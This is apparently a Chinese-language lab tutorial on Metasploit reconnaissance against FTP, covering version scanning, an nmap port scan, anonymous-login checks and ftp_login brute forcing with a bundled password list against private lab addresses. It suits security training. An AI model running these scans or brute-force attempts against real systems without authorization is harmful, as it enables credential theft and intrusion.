用Metasploit进行信息收集2

基于FTP协议收集信息

1.查看ftp服务的版本信息

打开metasploit

用Metasploit进行信息收集2_第1张图片

查看ftp版本的模块,并进入模块

msf6 > search ftp_version

msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > show options

用Metasploit进行信息收集2_第2张图片

查看靶机的端口开方情况,21端口开放才能被发现

nmap -p 1-50 192.168.67.130

用Metasploit进行信息收集2_第3张图片

可以查看到版本信息

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.67.130
msf6 auxiliary(scanner/ftp/ftp_version) > run

用Metasploit进行信息收集2_第4张图片

2.ftp匿名登录扫描

msf6 > use auxiliary/scanner/ftp/

msf6 > use  auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options 

msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.44.128
msf6 auxiliary(scanner/ftp/anonymous) > run

用Metasploit进行信息收集2_第5张图片

根据结果说明可以匿名访问不过是只读的方式

3.ftp暴力破解

msf6 > search ftp_login

msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.44.128

msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt                                                                       
msf6 auxiliary(scanner/ftp/ftp_login) > run                               

用Metasploit进行信息收集2_第6张图片

用Metasploit进行信息收集2_第7张图片

你可能感兴趣的:(kali,网络安全)